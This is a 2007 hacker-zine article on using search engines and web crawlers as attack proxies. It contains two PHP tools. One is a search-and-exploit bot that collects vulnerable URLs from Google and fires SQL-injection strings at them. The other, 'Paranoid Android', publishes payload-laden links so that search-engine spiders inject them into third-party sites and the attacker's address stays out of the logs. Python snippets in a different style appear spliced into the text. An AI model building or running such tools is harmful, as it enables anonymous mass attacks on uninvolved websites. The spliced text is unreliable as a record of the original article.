Title: I, Bot. Taking advantage of the power of robots.
Re: "Against the System: Rise of the Robots" by Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

Date: 2007-04-18

---------------------------------------------------------------------------------


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion

---------------------------------------------------------------------------------


---[ 0x00: Intro, let's start ]

Hello everybody. I apologize for my poor English; it is not my
first language. I hope you will excuse any errors ;)

This paper is meant as a reply to an article published in Phrack by Michal Zalewski.
He was the first to suggest the possibility of taking advantage of the multitude of
robots that scan the web at every moment in search of information.
We begin with the introduction to Zalewski's article, then see how to
implement his ideas when writing our own bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now let's see how all this is possible in reality ;) Have fun!

-----------------------------------------------------------------------------[/]


---[ 0x01: Abstract ]


The idea that search engines (Google first of all) could be turned
into powerful weapons in the hands of attackers is not new.
Google hacking, search dorks and cache digging are all techniques that
exploit a small part of what search engines know, but very few people,
until now, have thought of using their most sensitive and powerful component,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This is not the case; a robot simply visits sites
by requesting documents from them.
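
Since a robot is just a client requesting documents, what separates a
well-behaved one from any other script is mostly convention, such as honoring
the robot exclusion file cited in the references. The following is a minimal
sketch of that check using Python's standard urllib.robotparser; the rules,
the example.org host and the "ExampleBot" name are made up for illustration.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt content; a real robot would download it
# from the site's /robots.txt before requesting anything else.
ROBOTS_TXT = """\
User-agent: *
Disallow: /cgi-bin/
Disallow: /private/
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

# Ask, path by path, whether a robot named "ExampleBot" may fetch it.
allowed = {}
for path in ("/index.html", "/cgi-bin/search.cgi?q=test", "/private/notes.txt"):
    allowed[path] = parser.can_fetch("ExampleBot", "http://example.org" + path)
    print(path, "->", "allowed" if allowed[path] else "disallowed")
```

Note that the exclusion file is only advisory: it tells a cooperating robot
what to skip, and nothing forces a client to obey it.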

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate on the web?

For a complete overview you can consult the list of active bots
(http://www.robotstxt.org/wc/active/html/type.html).
We will not go into detail, because this topic is outside the article's
subject.

-----------------------------------------------------------------------------[/]

---[ 0x02: Implementation ]

What are the strong points of a bot?
Surely speed: the ability to execute a great number of operations in a
short time.
For exploitation we can write a bot with a function similar to mirroring which,
using the information found in a database or in a search engine, can carry out
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is the script below. It queries a search
engine such as Google (or another one) and builds an array with the addresses
of sites that contain certain web pages. If enabled, it can automatically exploit
many types of vulnerabilities (for example SQL injection).
Although it is a simple script, it can become a destructive weapon if used in the
wrong way (ok noob?).
I therefore ask any lamer readers not to use it to cause damage. It is only a
Proof of Concept.


- - - - -

    code:  - - - - -

    #!/usr/bin/php

    <?
    echo "
           --- Google Finder ---
     Automatic SaE (search-and-exploit) Bot
      by Crossbower <crossbower AT katamail DOT com>

    ";

    if ($argc<2) {
    echo "Usage: ".$argv[0]." <string> <result>
    Example:
    ".$argv[0]." /script/vuln.php?cmd= 30

    ";
    die;
    }

    //Init...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';


    function SendPack($packet)
    {
      global $proxy, $host, $port, $proxy_regex;
     
      if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
      }
      else {
       $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
          echo 'No response from proxy...';die;
       }
      }
      fputs($ock,$packet);
      if ($proxy=='') {
        $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
      }
      else {
        $buffer='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {
          $buffer.=fread($ock,1);
        }
      }
      fclose($ock);
      return($buffer);
    }


    //Global variables
    $host="www.google.com"; //Our vulnerability database ;)
    $path=$argv[1];         //String
    $port=80;               //Port (Web)
    $proxy="";              //For your proxy
    $html;                  //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A"; //Search inurl
    $SeType="&btnG=Search";        //Search type
    if ($argv[2]) $SeNumber="&num=".$argv[2];
    else $SeNumber="&num=20";      //Number of result

    if ($path[0]<>'/')  {print("*warning: string must begin with '/'\n");}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    //$path=urlencode($path);   //Url encoding


    echo "1: Find Targets...\n\n";
    //Google's inurl search (example):
    //http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search

    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $html=SendPack($packet);

    /* Find targets urls */
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
    for ($i=0; $i<count($match[1]); $i++)
            if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache")) echo $match[1][$i]."\n";


    /* This code is for exploiting targets. It's a Proof of Concept and it isn't complete.
       Don't use it for laming

    $ExplString="?var=" //String for exploiting. Good for sql injection.

    for ($i=0; $i<count($match[1]); $i++)
         if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache"))
    {

    $host=$match[1][$i];

    // Make and Send Exploit
    $packet ="GET ".$match[1][$i].$ExplString." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $buffer=SendPack($packet);

    if (strstr($buffer,$success)) //If the result is positive
    // Print result
    echo $buffer;
    }
    */

    ?>

    - - - - -

- - - - -


-----------------------------------------------------------------------------[/]

---[ 0x03: The code: Paranoid Android ]

Now let's try to implement a different kind of code: one that uses the crawlers
of search engines in a truly new way.

The operations of a crawler are simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.
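
The loop just described can be sketched in a few lines. This is only an
illustration under stated assumptions, not the code of any real search engine:
the "web" is a small in-memory dictionary of made-up example.org pages, the
fetch hook is hypothetical, and the only policy is breadth-first order with a
page limit.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urldefrag


class LinkExtractor(HTMLParser):
    """Collects the href value of every <a> tag in a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def crawl(seeds, fetch, max_pages=50):
    """Breadth-first crawl. `fetch(url)` is a hypothetical hook that
    returns the page HTML, or None if the URL cannot be retrieved."""
    frontier = deque(seeds)   # the crawl frontier: URLs still to visit
    seen = set(seeds)         # URLs already queued, to avoid loops
    visited = []              # visit order, kept for inspection

    while frontier and len(visited) < max_pages:
        url = frontier.popleft()
        html = fetch(url)
        if html is None:
            continue
        visited.append(url)

        extractor = LinkExtractor()
        extractor.feed(html)
        for href in extractor.links:
            # Resolve relative links and drop any #fragment.
            absolute, _fragment = urldefrag(urljoin(url, href))
            if absolute not in seen:
                seen.add(absolute)
                frontier.append(absolute)
    return visited


# Toy in-memory "web" used instead of real HTTP requests.
PAGES = {
    "http://example.org/": '<a href="/a.html">A</a> <a href="b.html">B</a>',
    "http://example.org/a.html": '<a href="/">home</a> <a href="/c.html?id=1">C</a>',
    "http://example.org/b.html": "no links here",
    "http://example.org/c.html?id=1": '<a href="/a.html#top">back</a>',
}

order = crawl(["http://example.org/"], PAGES.get)
print(order)
```

The point to notice is that the crawler never judges a link: whatever URL the
page author wrote, query string included, ends up in the frontier and is
requested later.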

As we can see, this method depends closely on the contents of a web page,
which can send the crawler off to explore numerous other links.
Now we ask ourselves: how safe is this kind of method?

Suppose that the visited website contains exploit links (for example, SQL injection)
that call dynamic pages on other websites. What happens in this case?
The heuristic spider follows the links and injects the code into those websites.
Then it saves all the results in the database of its search engine.
Isn't it fantastic? ;)

And which IP remains in the logs? The IP of the search engine which, given the many
sites its spider visits every day, will have a hard time finding our malicious
site. If it is willing to investigate at all...
In any case, if our site is discovered, how many more searches are needed to
find the culprit?
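
Seen from the side of the visited site, the same situation can be sketched as
a small log filter. This is a rough illustration, assuming access logs in the
common "combined" format; the sample lines, the addresses (taken from
documentation ranges), the list of crawler names and the list of suspicious
characters are all assumptions chosen for the example, not a complete
detection rule.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined format: ip - - [date] "METHOD path PROTO" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

CRAWLER_HINTS = ("googlebot", "slurp", "msnbot")  # assumption: partial list
SUSPICIOUS = ("'", '"', "<", ">", "--", ";")      # assumption: crude markers


def crawler_hits_with_odd_queries(lines):
    """Return (ip, path) for crawler requests whose query string looks odd."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        agent = match["agent"].lower()
        if not any(hint in agent for hint in CRAWLER_HINTS):
            continue
        # Decode %xx escapes so that %27 is seen as a quote character.
        query = unquote(urlsplit(match["path"]).query)
        if any(marker in query for marker in SUSPICIOUS):
            hits.append((match["ip"], match["path"]))
    return hits


SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2007:10:00:00 +0200] "GET /vuln.php?a=%27SQL HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.10 - - [18/Apr/2007:10:00:05 +0200] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.7 - - [18/Apr/2007:10:01:00 +0200] "GET /vuln.php?a=1 HTTP/1.1" '
    '200 300 "-" "Mozilla/5.0 (X11; Linux i686)"',
]

hits = crawler_hits_with_odd_queries(SAMPLE_LOG)
print(hits)
```

In the made-up log the flagged request carries the crawler's address and an
empty referer, so the entry by itself does not say which page contained the
link.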

Now, because code is worth more than a thousand words, here is a robot that, if
configured correctly, can use the techniques described in this article.

Voilà, Paranoid Android:

- - - - -

    code:  - - - - -

    <HTML>
    <HEAD>
    <TITLE>Paranoid Android, By Crossbower</TITLE>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <META HTTP-EQUIV="Content-Language" CONTENT=en>
    <META name="Keywords" content="Search Bot, ParAnd. PA Robot.">
    </HEAD>
    <BODY>

    <?
    //CONFIGURATION OF THE BOT:

    //Main settings
    $string="vuln.php";      //Define the url or the vulnerabilities to try
    $exploit="?a='SQL";      //Define the exploit for the vulnerabilities
    $LogFile="BotLog.html";  //Log file

    //Global variables
    $host="www.google.com";  //Our vulnerability database ;)
    $port=80;                //Port (Web)
    $html;                   //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A";  //Search inurl
    $SeCache="/search?q=cache%3A";  //Search cache
    $SeType="&btnG=Search";         //Search type
    $SeNumber="&num=5";             //Number of result

    /*
    Google's inurl search (example):
    http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search
    */

    //$string=urlencode($string);   //Url encoding

    //CONFIGURATION END

    echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    --- PARANOID ANDROID ---                <br>&nbsp;
    Automatic SaE (search-and-exploit) Bot  <br>&nbsp;&nbsp;
    by Crossbower Crossbower*katamail*com <br>

    <Thanks to: Radiohead, for the music and the name>
    <br>
    ";


    //Loading...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    function SendPack($packet)
    {
      global $host, $port;
     
       $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
       
      fputs($ock,$packet);
     
       $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
     
      fclose($ock);
      return($buffer);
    }


    //START:
    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $html=SendPack($packet);

    //Open log file
    $handle =fopen($LogFile,'a');

    //Initialize the log
    fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."<br><br>\n");
    fwrite($handle,"Visited by:<br>\n");

    $Spider =$REMOTE_HOST."<br>".$REMOTE_ADDR."<br>";
    $Spider.=$HTTP_USER_AGENT."<br>".$HTTP_REFERER."<br>";
    $Spider.=$HTTP_ACCEPT_LANGUAGE."<br><br>\n";

    fwrite($handle,$Spider);
    fwrite($handle,"Links (google cache):<br>\n");

    $Log ="<a href=\"";
    $Log.="http://".$host.$SeCache;


    //Find targets
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);

    for ($i=0; $i<count($match[1]); $i++) {
    //Select the result:
    if (  strstr($match[1][$i],$string)  &&
         !strstr($match[1][$i],"google") &&
         !strstr($match[1][$i],"cache"))
    {
       echo "<a href=\"".$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n";
       
       //Update log
       fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n");
    }}

    //Close log
    fwrite($handle,"<br><br>\n");
    fclose($handle);

    ?>
    </BODY>
    </HTML>

    - - - - -

- - - - -

-----------------------------------------------------------------------------[/]

---[ 0x04: Conclusion ]

I hope this information has interested you and has made you understand
the gravity of possible future attacks using robots...

To go deeper you can read these documents:

- "Against the System: Rise of the Robots" by Michal Zalewski
http://www.phrack.org/archives/57/p57-0x13

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm

- Proprietary web solutions security, Michal Zalewski
http://lcamtuf.coredump.cx/milpap.txt

- "A Standard for Robot Exclusion", Martijn Koster
http://info.webcrawler.com/mak/projects/robots/norobots.html

- "The Web Robots Database"
http://www.robotstxt.org/wc/active.html
http://www.robotstxt.org/wc/active/html/type.html

- "Web Security FAQ", Lincoln D. Stein
http://www.w3.org/Security/Faq/www-security-faq.html


Ok, that's all folks...
For clarifications, questions and anything else, don't hesitate to mail me ;)

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

-----------------------------------------------------------------------------[/]